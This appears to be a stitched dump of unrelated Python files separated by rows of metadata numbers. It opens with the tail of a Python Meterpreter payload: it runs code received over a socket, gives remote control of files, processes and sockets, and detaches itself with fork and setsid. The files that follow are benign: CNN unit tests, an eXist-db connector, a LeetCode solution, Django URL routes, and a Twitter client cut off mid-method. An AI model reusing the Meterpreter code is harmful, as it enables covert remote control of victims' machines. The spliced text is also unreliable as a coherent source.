        if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
            return ERROR_FAILURE
        preloadlib_methods = self.extension_functions.keys()
        i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
        i.runcode(compile(data_tlv['value'], '', 'exec'))
        postloadlib_methods = self.extension_functions.keys()
        new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
        for method in new_methods:
            response += tlv_pack(TLV_TYPE_METHOD, method)
        return ERROR_SUCCESS, response

    def _core_shutdown(self, request, response):
        response += tlv_pack(TLV_TYPE_BOOL, True)
        self.running = False
        return ERROR_SUCCESS, response
    def _core_channel_open(self, request, response):
        channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
        handler = 'channel_create_' + channel_type['value']
        if handler not in self.extension_functions:
            return ERROR_FAILURE, response
        handler = self.extension_functions[handler]
        return handler(request, response)

    def _core_channel_close(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        if isinstance(channel, file):
            channel.close()
        elif isinstance(channel, subprocess.Popen):
            channel.kill()
        elif isinstance(channel, socket._socketobject):  # was isinstance(s, ...); 's' is not defined in this scope
            channel.close()
        else:
            return ERROR_FAILURE, response
        del self.channels[channel_id]
        if channel_id in self.interact_channels:
            self.interact_channels.remove(channel_id)
        return ERROR_SUCCESS, response
    def _core_channel_eof(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        result = False
        if isinstance(channel, file):
            result = channel.tell() == os.fstat(channel.fileno()).st_size
        response += tlv_pack(TLV_TYPE_BOOL, result)
        return ERROR_SUCCESS, response

    def _core_channel_interact(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
        if toggle:
            if channel_id in self.interact_channels:
                self.interact_channels.remove(channel_id)
            else:
                self.interact_channels.append(channel_id)
        elif channel_id in self.interact_channels:
            self.interact_channels.remove(channel_id)
        return ERROR_SUCCESS, response
    def _core_channel_read(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        data = ''
        if isinstance(channel, file):
            data = channel.read(length)
        elif isinstance(channel, STDProcess):
            if channel.poll() != None:
                self.handle_dead_resource_channel(channel_id)
            if channel.stdout_reader.is_read_ready():
                data = channel.stdout_reader.read(length)
        elif isinstance(channel, socket._socketobject):  # was isinstance(s, ...); 's' is not defined in this scope
            data = channel.recv(length)
        else:
            return ERROR_FAILURE, response
        response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
        return ERROR_SUCCESS, response
    def _core_channel_write(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
        length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        l = len(channel_data)
        if isinstance(channel, file):
            channel.write(channel_data)
        elif isinstance(channel, subprocess.Popen):
            if channel.poll() != None:
                self.handle_dead_resource_channel(channel_id)
                return ERROR_FAILURE, response
            channel.stdin.write(channel_data)
        elif isinstance(channel, socket._socketobject):  # was isinstance(s, ...); 's' is not defined in this scope
            try:
                l = channel.send(channel_data)
            except socket.error:
                channel.close()
                self.handle_dead_resource_channel(channel_id)
                return ERROR_FAILURE, response
        else:
            return ERROR_FAILURE, response
        response += tlv_pack(TLV_TYPE_LENGTH, l)
        return ERROR_SUCCESS, response
    def create_response(self, request):
        resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
        method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
        resp += tlv_pack(method_tlv)
        reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
        resp += tlv_pack(reqid_tlv)
        if method_tlv['value'] in self.extension_functions:
            handler = self.extension_functions[method_tlv['value']]
            try:
                result, resp = handler(request, resp)
            except Exception, err:
                result = ERROR_FAILURE
        else:
            result = ERROR_FAILURE
        resp += tlv_pack(TLV_TYPE_RESULT, result)
        resp = struct.pack('>I', len(resp) + 4) + resp
        return resp
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
    if hasattr(os, 'setsid'):
        os.setsid()
    met = PythonMeterpreter(s)  # 's' is the connected socket provided by the stager
    met.run()
| 33.737226 | 134 | 0.706044 | 1,998 | 13,866 | 4.585085 | 0.12963 | 0.053488 | 0.070844 | 0.027835 | 0.470145 | 0.379762 | 0.334898 | 0.292435 | 0.259251 | 0.251173 | 0 | 0.016563 | 0.177052 | 13,866 | 410 | 135 | 33.819512 | 0.786259 | 0.016515 | 0 | 0.331445 | 0 | 0 | 0.028485 | 0.001909 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002833 | 0.028329 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8155fb4487ab6eefaea72ef47aa753b0a19b9bd | 264 | py | Python | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 1 | 2020-12-08T19:00:33.000Z | 2020-12-08T19:00:33.000Z | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 3 | 2021-03-30T13:47:03.000Z | 2021-09-22T19:03:46.000Z | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 1 | 2020-04-24T14:39:03.000Z | 2020-04-24T14:39:03.000Z | from django.conf import settings
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('txt-jokes-administratus/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('', include('pages.urls')),
]
| 24 | 54 | 0.704545 | 33 | 264 | 5.636364 | 0.545455 | 0.16129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140152 | 264 | 10 | 55 | 26.4 | 0.819383 | 0 | 0 | 0 | 0 | 0 | 0.208333 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
b8187e4887ed852a5b867debdeeccee5408895fe | 7,134 | py | Python | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | 2 | 2018-02-05T12:41:31.000Z | 2018-11-23T04:13:13.000Z | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | import unittest
import numpy as np
import utils.imageutils as imgutils
import utils.numpyutils as nputils
from algorithms.neuralnetwork.convolutional.conv_net import ConvNet
from datahandler.numerical.NumericalDataSet import NumericalDataSet
import utils.serialization as srlztn
def gen_vertical_bars(num):
    bars = []
    for _ in range(num):
        x, y = np.random.randint(low=0, high=15, size=2)
        length = np.random.randint(low=4, high=13)
        bar = np.zeros((16, 16))
        bar[y:y+length, x:x+2] = 1
        bars.append(bar)
    return bars
def gen_horizontal_bars(num):
    bars = []
    for _ in range(num):
        x, y = np.random.randint(low=0, high=15, size=2)
        length = np.random.randint(low=4, high=13)
        bar = np.zeros((16, 16))
        bar[y:y+2, x:x+length] = 1
        bars.append(bar)
    return bars
class Test(unittest.TestCase):

    def test_bars(self):
        # 16x16 images with bars that are 2 pixel thick
        train_verticals = gen_vertical_bars(50)
        train_horizontals = gen_horizontal_bars(50)
        test_verticals = gen_vertical_bars(50)
        test_horizontals = gen_horizontal_bars(50)
        inputs = np.array(train_verticals + train_horizontals)
        targets = np.array([[1, 0] for _ in train_verticals] + [[0, 1] for _ in train_horizontals])
        data_set = NumericalDataSet(inputs, targets)
        test_inputs = np.array(test_verticals + test_horizontals)
        test_targets = np.array([[1, 0] for _ in test_verticals] + [[0, 1] for _ in test_horizontals])
        test_data_set = NumericalDataSet(test_inputs, test_targets)
        # 16x16 -> C(3): 14x14 -> P(2): 7x7 -> C(3): 5x5 -> P(5): 1x1
        net_topo = [('c', 3, 6), ('p', 2), ('c', 3, 8), ('p', 5), ('mlp', 8, 8, 2)]
        net = ConvNet(iterations=50, learning_rate=0.001, topo=net_topo)
        net.train(data_set)
        preds = net.predict(test_data_set)
        conf_mat = nputils.create_confidence_matrix(preds, test_targets, 2)
        print "Error rate: " + str(100 - (np.sum(conf_mat.diagonal()) / np.sum(conf_mat[:, :]) * 100)) + "%"
    def test_mnist_digits(self):
        digits, labels = imgutils.load_mnist_digits('../../data/mnist-digits/train-images.idx3-ubyte', '../../data/mnist-digits/train-labels.idx1-ubyte', 300)
        targets = np.array([ nputils.vec_with_one(10, digit) for digit in labels ])
        train_data_set = NumericalDataSet(np.array(digits)[:150], targets[:150])
        test_data_set = NumericalDataSet(np.array(digits)[150:], targets[150:])
        # 28x28 -> C(5): 24x24 -> P(2): 12x12 -> C(5): 8x8 -> P(2): 4x4 -> C(4): 1x1
        net_topo = [('c', 5, 8), ('p', 2), ('c', 5, 16), ('p', 2), ('c', 4, 16), ('mlp', 16, 16, 10)]
        net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo, activation_func=(nputils.rectifier, nputils.rectifier_deriv))
        net.train(train_data_set)
        try:
            srlztn.save_object('../../trained/mnist_digits.cnn', net)
        except:
            print("serialization error")
        preds = net.predict(test_data_set)
        conf_mat = nputils.create_confidence_matrix(preds, targets[150:], 10)
        print conf_mat
        num_correct = np.sum(conf_mat.diagonal())
        num_all = np.sum(conf_mat[:, :])
        print "Error rate: " + str(100 - (num_correct / num_all * 100)) + "% (" + str(int(num_correct)) + "/" + str(int(num_all)) + ")"
    def test_face_recognition(self):
        faces = imgutils.load_images('/home/simon/trainingdata/faces/', max_num=100)
        non_faces = imgutils.load_images('/home/simon/trainingdata/nonfaces/', max_num=100)
        faces_training = faces[0:50]
        faces_testing = faces[50:]
        non_faces_training = non_faces[0:50]
        non_faces_testing = non_faces[50:]
        inputs_training = np.array(faces_training + non_faces_training)
        targets_training = np.array([ [1, 0] for _ in range(len(faces_training))] + [ [0, 1] for _ in range(len(non_faces_training))])
        data_set_training = NumericalDataSet(inputs_training, targets_training)
        inputs_testing = np.array(faces_testing + non_faces_testing)
        targets_testing = np.array([ [1, 0] for _ in range(len(faces_testing))] + [ [0, 1] for _ in range(len(non_faces_testing))])
        data_set_testing = NumericalDataSet(inputs_testing, targets_testing)
        # 24x24 -> C(5): 20x20 -> P(2): 10x10 -> C(3): 8x8 -> P(2): 4x4 -> C(3): 2x2 -> p(2): 1x1
        net_topo = [('c', 5, 8), ('p', 2), ('c', 3, 16), ('p', 2), ('c', 3, 24), ('p', 2), ('mlp', 24, 24, 2)]
        net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo)
        net.train(data_set_training)
        preds = net.predict(data_set_testing)
        conf_mat = nputils.create_confidence_matrix(preds, targets_testing, 2)
        num_correct = np.sum(conf_mat.diagonal())
        num_all = np.sum(conf_mat[:, :])
        print "Error rate: " + str(100 - (num_correct / num_all * 100)) + "% (" + str(int(num_correct)) + "/" + str(int(num_all)) + ")"

        # fig = plt.figure(1)
        # plt.set_cmap('gray')
        # num_rows = 6x-img.shape[0]
        # num_cols = 4
        # fig.add_subplot(num_rows, num_cols, 1)
        # plt.imshow(faces[0])
        # for fm_idx in range(4):
        #     fig.add_subplot(num_rows, num_cols, num_cols*1 + fm_idx + 1)
        #     plt.imshow(convolved1[fm_idx, :, :])
        #     fig.add_subplot(num_rows, num_cols, num_cols*2 + fm_idx + 1)
        #     plt.imshow(pooled1[fm_idx, :, :])
        #     fig.add_subplot(num_rows, num_cols, num_cols*3 + fm_idx + 1)
        #     plt.imshow(convolved2[fm_idx, :, :])
        #     fig.add_subplot(num_rows, num_cols, num_cols*4 + fm_idx + 1)
        #     plt.imshow(np.array([[pooled2[0, fm_idx]]]), vmin=0, vmax=1)
        # fig.add_subplot(num_rows, num_cols, 21)
        # plt.imshow(np.array([[mlp_out[2][0, 0]]]), vmin=0, vmax=1)
        # fig.add_subplot(num_rows, num_cols, 22)
        # plt.imshow(np.array([[mlp_out[2][0, 1]]]), vmin=0, vmax=1)
        #
        # plt.show()
    def test_smoke(self):
        smoke_imgs_training = imgutils.load_images('/home/simon/smoke/training/smoke/', max_num=100)
        non_smoke_imgs_training = imgutils.load_images('/home/simon/smoke/training/non-smoke/', max_num=100)
        inputs_training = np.array(smoke_imgs_training + non_smoke_imgs_training)
        targets_training = np.array([ [1, 0] for _ in range(len(smoke_imgs_training))] + [ [0, 1] for _ in range(len(non_smoke_imgs_training))])
        data_set_training = NumericalDataSet(inputs_training, targets_training)
        # 100x100 -> C(5): 96x96 -> P(2): 48x48 -> C(5): 44x44 -> P(2): 22x22 -> C(3): 20x20 -> P(2): 10x10 -> C(3): 8x8 -> P(2) 4x4 -> C(3): 2x2 -> P(2): 1x1
        net_topo = [('c', 5, 8), ('p', 2), ('c', 5, 16), ('p', 2), ('c', 3, 24), ('p', 2), ('c', 3, 24), ('p', 2), ('c', 3, 24), ('p', 2), ('mlp', 24, 24, 2)]
        net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo)
        net.train(data_set_training)
if __name__ == "__main__":
    #import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
| 49.2 | 158 | 0.610457 | 1,036 | 7,134 | 3.985521 | 0.179537 | 0.010656 | 0.006539 | 0.027125 | 0.554856 | 0.493582 | 0.481957 | 0.444175 | 0.392347 | 0.31969 | 0 | 0.065414 | 0.224278 | 7,134 | 145 | 159 | 49.2 | 0.680701 | 0.179282 | 0 | 0.301075 | 0 | 0 | 0.063487 | 0.044441 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.075269 | null | null | 0.053763 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b819490a0e749fdb6fa33717dab9405f34226e11 | 2,747 | py | Python | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | null | null | null | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | 23 | 2017-08-25T16:48:57.000Z | 2022-02-16T00:55:42.000Z | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | 13 | 2017-07-03T09:15:36.000Z | 2021-07-02T07:43:10.000Z | import requests
from requests.auth import HTTPBasicAuth
import sys
import os
from string import rfind
import base64
class XdbException(Exception):
    '''Exist db connector exception'''

class Connector:
    def __init__(self, url, user, password):
        self.url = url
        self.auth = HTTPBasicAuth(user, password)
    '''
    Create collection
    '''
    def create(self, root, collection):
        print "creating collection %s in %s ..." % (collection, root)
        params = {
            '_query': 'xmldb:create-collection("%s","%s")'% (root, collection)
        }
        response = requests.get('%s/exist/rest/db'% (self.url), auth=self.auth, params=params)
        if 200 != response.status_code:
            raise XdbException
        return '%s/%s'%(root, collection)
    '''
    chmod resource
    Apply given permission on eXist-db resource
    '''
    def chmod(self, resource, permissions):
        print "setting permissions %s on %s "% (permissions, resource)
        params = {
            '_query': 'sm:chmod(xs:anyURI("%s"), "%s")'% (resource, permissions)
        }
        response = requests.get('%s/exist/rest/db'% (self.url), auth=self.auth, params=params)
        if 200 != response.status_code:
            raise XdbException
    '''
    Put document to collection
    Collection will be created if it does not exist
    '''
    def upload(self, fsPath, collection):
        print "storing from fs path %s to collection /%s ..." % (fsPath, collection)
        _, doc = os.path.split(fsPath)
        __, extension = os.path.splitext(doc)
        print 'extension, doc', extension, doc
        f = open(fsPath, 'r')
        xqm = f.read()
        f.close()
        content_types = {
            '.xqm': 'application/xquery',
            '.xq': 'application/xquery',
            '.xpl': 'application/xml',
            '.xquery': 'application/xquery',
            '.xml': 'application/xml',
            '.xconf': 'application/xml',
            '.xhtml': 'application/xml',
            '.xsl': 'application/xml'
        }
        headers = {
            'Content-Type': content_types[extension]
        }
        response = requests.put('%s/exist/rest/%s/%s'% (self.url, collection, doc), auth=self.auth, headers=headers, data=xqm)
        if 201 != response.status_code:
            print str(response)
            raise XdbException
        return '%s/%s' % (collection, doc)
    '''
    Execute a stored Xquery remotely
    '''
    def execute(self, document):
        headers = {
            'Content-Type': 'application/xquery'
        }
        response = requests.get('%s/exist/rest/%s'% (self.url, document), auth=self.auth, headers=headers)
        if 200 != response.status_code:
            raise XdbException
        return response
| 32.702381 | 127 | 0.581361 | 300 | 2,747 | 5.273333 | 0.316667 | 0.026549 | 0.025284 | 0.037927 | 0.230089 | 0.180152 | 0.16182 | 0.16182 | 0.128951 | 0.128951 | 0 | 0.007067 | 0.27885 | 2,747 | 84 | 128 | 32.702381 | 0.791519 | 0 | 0 | 0.209677 | 0 | 0 | 0.197395 | 0.024013 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.032258 | 0.096774 | null | null | 0.080645 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62982d88e6406e32cdc302d54bc0206efda33025 | 957 | py | Python | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 144 | 2020-09-13T22:54:57.000Z | 2022-02-24T21:54:25.000Z | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 587 | 2020-05-06T18:55:07.000Z | 2021-09-20T13:14:53.000Z | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 523 | 2020-09-09T12:07:13.000Z | 2022-02-24T21:54:31.000Z | '''
Problem:-
Given a string s, find the longest palindromic substring in s.
You may assume that the maximum length of s is 1000.
Example 1:
Input: "babad"
Output: "bab"
Note: "aba" is also a valid answer.
'''
class Solution:
    def longestPalindrome(self, s: str) -> str:
        res = ""
        resLen = 0

        for i in range(len(s)):
            # odd length
            l, r = i, i
            while l >= 0 and r < len(s) and s[l] == s[r]:
                if (r - l + 1) > resLen:
                    res = s[l:r + 1]
                    resLen = r - l + 1
                l -= 1
                r += 1

            # even length
            l, r = i, i + 1
            while l >= 0 and r < len(s) and s[l] == s[r]:
                if (r - l + 1) > resLen:
                    res = s[l:r + 1]
                    resLen = r - l + 1
                l -= 1
                r += 1

        return res
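The same expand-around-center idea as a standalone function, handy for a quick sanity check (the function name is mine, not part of the solution above):

```python
def longest_palindrome(s):
    # Try every index as the center of an odd- and an even-length palindrome.
    res = ""
    for i in range(len(s)):
        for l, r in ((i, i), (i, i + 1)):
            while l >= 0 and r < len(s) and s[l] == s[r]:
                if r - l + 1 > len(res):
                    res = s[l:r + 1]
                l -= 1
                r += 1
    return res

print(longest_palindrome("babad"))  # bab
print(longest_palindrome("cbbd"))   # bb
```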

# --- bookmarks/account/urls.py (dorotan/social, Apache-2.0) ---

from django.conf.urls import url
from django.contrib.auth import views as auth_views

from . import views

urlpatterns = [
    # Custom login view
    # url(r'^login/$', views.user_login, name='login'),
    # Built-in login view
    url(r'^login/$', auth_views.login, name='login'),
    url(r'^edit/$', views.edit, name='edit'),
    url(r'^logout/$', auth_views.logout, name='logout'),
    url(r'^logout_then_login/$', auth_views.logout_then_login, name='logout_then_login'),
    url(r'^$', views.dashboard, name='dashboard'),
    url(r'^password_change/$', auth_views.password_change, name='password_change'),
    url(r'^password_change/done/$', auth_views.password_change_done, name='password_change_done'),
    url(r'^password_reset/$', auth_views.password_reset, name='password_reset'),
    url(r'^password_reset/done/$', auth_views.password_reset_done, name='password_reset_done'),
    url(r'^password_reset/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/$', auth_views.password_reset_confirm, name='password_reset_confirm'),
    url(r'^password_reset/complete/$', auth_views.password_reset_complete, name='password_reset_complete'),
    url(r'^register/$', views.register, name='register'),
]
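The `password_reset_confirm` pattern is the only non-trivial regex in this URLconf; a quick standalone check of what its two named groups capture (the uid/token values are made up):

```python
import re

# Same pattern as in the urlpatterns entry above.
pat = re.compile(r'^password_reset/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/$')
m = pat.match('password_reset/confirm/Mg-abc123-def456/')
# uidb64 cannot contain '-', so it stops at the first dash; token takes the rest.
print(m.group('uidb64'), m.group('token'))  # Mg abc123-def456
```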

# --- examples/twitter.py (alex/remoteobjects, BSD-3-Clause) ---

#!/usr/bin/env python
# Copyright (c) 2009 Six Apart Ltd.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of Six Apart Ltd. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
A Twitter API client, implemented using remoteobjects.
"""
__version__ = '1.1'
__date__ = '17 April 2009'
__author__ = 'Brad Choate'
import httplib
from optparse import OptionParser
import sys
from urllib import urlencode, quote_plus
from urlparse import urljoin, urlunsplit
from httplib2 import Http
from remoteobjects import RemoteObject, fields, ListObject
class User(RemoteObject):

    """A Twitter account.

    A User can be retrieved from ``http://twitter.com/users/show.json`` with
    the appropriate ``id``, ``user_id``, or ``screen_name`` parameter.

    """

    id = fields.Field()
    name = fields.Field()
    screen_name = fields.Field()
    location = fields.Field()
    description = fields.Field()
    profile_image_url = fields.Field()
    protected = fields.Field()
    followers_count = fields.Field()
    status = fields.Object('Status')

    @classmethod
    def get_user(cls, http=None, **kwargs):
        url = '/users/show'
        if 'id' in kwargs:
            url += '/%s.json' % quote_plus(kwargs['id'])
        else:
            url += '.json'
        # Keep only supported query parameters; filter() over a dict yields keys
        # only, so build a key/value mapping for urlencode instead.
        query = urlencode(dict((k, v) for k, v in kwargs.items() if k in ('screen_name', 'user_id')))
        url = urlunsplit((None, None, url, query, None))
        return cls.get(urljoin(Twitter.endpoint, url), http=http)
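The query-string assembly pattern these classes share, as a Python 3 sketch (`urllib.parse.urlencode` is the modern spelling of the `urllib.urlencode` imported above; the helper name is mine):

```python
from urllib.parse import urlencode

def build_query(allowed, **kwargs):
    # Keep only the parameters the endpoint understands. Note that filter()
    # over a dict would yield keys only; we must filter the items instead.
    return urlencode({k: v for k, v in kwargs.items() if k in allowed})

print(build_query(('screen_name', 'user_id'), screen_name='brad', page=2))  # screen_name=brad
```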
class DirectMessage(RemoteObject):

    """A Twitter direct message.

    The authenticated user's most recent direct messages are at
    ``http://twitter.com/direct_messages.json``.

    """

    id = fields.Field()
    sender_id = fields.Field()
    text = fields.Field()
    recipient_id = fields.Field()
    created_at = fields.Field()
    sender_screen_name = fields.Field()
    recipient_screen_name = fields.Field()
    sender = fields.Object(User)
    recipient = fields.Object(User)

    def __unicode__(self):
        return u"%s: %s" % (self.sender.screen_name, self.text)
class Status(RemoteObject):

    """A Twitter update.

    Statuses can be fetched from
    ``http://twitter.com/statuses/show/<id>.json``.

    """

    created_at = fields.Field()
    id = fields.Field()
    text = fields.Field()
    source = fields.Field()
    truncated = fields.Field()
    in_reply_to_status_id = fields.Field()
    in_reply_to_user_id = fields.Field()
    in_reply_to_screen_name = fields.Field()
    favorited = fields.Field()
    user = fields.Object(User)

    @classmethod
    def get_status(cls, id, http=None):
        return cls.get(urljoin(Twitter.endpoint, "/statuses/show/%d.json" % int(id)), http=http)

    def __unicode__(self):
        return u"%s: %s" % (self.user.screen_name, self.text)
class DirectMessageList(ListObject):

    entries = fields.List(fields.Object(DirectMessage))

    def __getitem__(self, key):
        return self.entries.__getitem__(key)

    @classmethod
    def get_messages(cls, http=None, **kwargs):
        url = '/direct_messages.json'
        query = urlencode(dict((k, v) for k, v in kwargs.items() if k in ('since_id', 'page')))
        url = urlunsplit((None, None, url, query, None))
        return cls.get(urljoin(Twitter.endpoint, url), http=http)

    @classmethod
    def get_sent_messages(cls, http=None, **kwargs):
        url = '/direct_messages/sent.json'
        query = urlencode(dict((k, v) for k, v in kwargs.items() if k in ('since_id', 'page')))
        url = urlunsplit((None, None, url, query, None))
        return cls.get(urljoin(Twitter.endpoint, url), http=http)
class UserList(ListObject):

    entries = fields.List(fields.Object(User))

    def __getitem__(self, key):
        return self.entries.__getitem__(key)

    @classmethod
    def get_friends(cls, http=None, **kwargs):
        return cls.get_related("friends", http=http, **kwargs)

    @classmethod
    def get_followers(cls, http=None, **kwargs):
        return cls.get_related("followers", http=http, **kwargs)

    @classmethod
    def get_related(cls, relation, http=None, **kwargs):
        url = '/statuses/%s' % relation
        if 'id' in kwargs:
            url += '/%s.json' % quote_plus(kwargs['id'])
        else:
            url += '.json'
        query = urlencode(dict((k, v) for k, v in kwargs.items() if k in ('screen_name', 'user_id', 'page')))
        url = urlunsplit((None, None, url, query, None))
        return cls.get(urljoin(Twitter.endpoint, url), http=http)
class Timeline(ListObject):

    entries = fields.List(fields.Object(Status))

    def __getitem__(self, key):
        return self.entries.__getitem__(key)

    @classmethod
    def public(cls, http=None):
        return cls.get(urljoin(Twitter.endpoint, '/statuses/public_timeline.json'), http=http)

    @classmethod
    def friends(cls, http=None, **kwargs):
        query = urlencode(dict((k, v) for k, v in kwargs.items() if k in ('since_id', 'max_id', 'count', 'page')))
        url = urlunsplit((None, None, '/statuses/friends_timeline.json', query, None))
        return cls.get(urljoin(Twitter.endpoint, url), http=http)

    @classmethod
    def user(cls, http=None, **kwargs):
        url = '/statuses/user_timeline'
        if 'id' in kwargs:
            url += '/%s.json' % quote_plus(kwargs['id'])
        else:
            url += '.json'
        query = urlencode(dict((k, v) for k, v in kwargs.items() if k in ('screen_name', 'user_id', 'since_id', 'max_id', 'page')))
        url = urlunsplit((None, None, url, query, None))
        return cls.get(urljoin(Twitter.endpoint, url), http=http)

    @classmethod
    def mentions(cls, http=None, **kwargs):
        query = urlencode(dict((k, v) for k, v in kwargs.items() if k in ('since_id', 'max_id', 'page')))
        url = urlunsplit((None, None, '/statuses/mentions.json', query, None))
        return cls.get(urljoin(Twitter.endpoint, url), http=http)
class Twitter(Http):

    """A user agent for interacting with Twitter.

    Instances of this class are full ``httplib2.Http`` HTTP user agent
    objects, but provide convenience methods for interacting with
    Twitter and its data objects.

    """

    endpoint = 'http://twitter.com/'

    def public_timeline(self):
        return Timeline.public(http=self)

    def friends_timeline(self, **kwargs):
        return Timeline.friends(http=self, **kwargs)

    def user_timeline(self, **kwargs):
        return Timeline.user(http=self, **kwargs)

    def show(self, id):
